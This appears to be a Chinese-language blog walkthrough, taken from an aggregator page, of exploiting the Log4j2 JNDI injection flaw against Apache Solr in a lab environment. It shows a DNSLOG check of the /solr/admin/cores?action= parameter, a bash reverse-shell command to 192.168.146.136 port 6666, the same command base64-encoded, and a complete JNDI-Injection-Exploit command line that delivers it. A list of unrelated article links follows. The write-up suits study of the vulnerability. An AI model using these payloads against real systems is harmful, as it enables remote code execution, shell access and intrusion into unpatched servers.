当前位置: 首页 > news >正文

代码执行漏洞-Log4j2漏洞

news 2025/7/5 6:04:56

启动靶场环境

⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果..
 

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!

 

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
反弹shell
bash -i >& /dev/tcp/192.168.146.136/6666 0>&1
反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx
最终Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.146.136"

服务器监听

 

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址. 

 


http://www.mrgr.cn/news/21452.html

相关文章:

  • Java程序分析工具
  • 双项第一!鼎捷强势领跑PLM市场
  • Web应用监控:URL事务监测指标解读
  • Docker安装mysql5.7
  • 【论文阅读】DETRs Beat YOLOs on Real-time Object Detection
  • 分布式项目中使用雪花算法提前获取对象主键ID
  • 一台电脑对应一个IP地址吗?‌探讨两台电脑共用IP的可能性
  • 【leetcode刷题之路】面试经典hot100(2)——普通数组+矩阵+链表
  • 【数据结构与算法 | 灵神题单 | 删除链表篇】力扣3217, 82, 237
  • Vite + Vue3 +Vant4出现Toast is not a function
  • 005:VTK世界坐标系中的相机和物体
  • 暂停Windows更新方法
  • 品牌推广的常用宣发策略有什么? 媒体宣发、软文发稿等
  • Spring框架中的循环依赖详解以及解决方案
  • gazebo 查看URDF模型(转sdf)
  • LeetCode 3176.求出最长好子序列 I:动态规划(DP)
  • 修改密码模块中对轮询接口响应用户失效问题的处理
  • 基于ASP+ACCESS的教师信息管理系统
  • 西方社会学理论教程(侯均生)笔记
  • SprinBoot+Vue应急信息管理系统的设计与实现